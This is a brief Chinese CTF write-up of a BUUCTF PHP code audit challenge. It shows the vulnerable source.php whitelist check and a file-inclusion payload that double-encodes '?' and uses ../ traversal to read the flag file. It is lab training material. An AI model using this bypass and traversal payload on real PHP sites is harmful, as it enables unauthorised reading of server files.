根据题目提示是php代码审计
1.启动靶机
2.查看源代码f12
代码有文件包含
3.http://38f872fd-deb7-42aa-b8f9-34449a4a6227.node4.buuoj.cn/source.php
<?php highlight_file(__FILE__); //高亮 class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //白名单设置 if (! isset($page) || !is_string($page)) { //传参是否有值 echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { //参数是否在白名单内 return true; } $_page = mb_substr( //检查参数?前的值是否在白名单内 $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); //url二次进行解码 ,注意添加参数 $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
根据上面的代码可以构造payload:路径/source.php?file=source.php%253fffffllllaaaagggg的参数
(ffffllllaaaagggg提示在hint.php中)
4.payload打不开证明文件不在该层上,一次尝试
/source.php?file=source.php%253../fffffllllaaaagggg
/source.php?file=source.php%253../../fffffllllaaaagggg
...
...
/source.php?file=source.php%253f../../../../../fffffllllaaaagggg
题目比较基础,我从csdn论坛上找几篇这个题的解释,基本就可以能够对这题的操作进行解释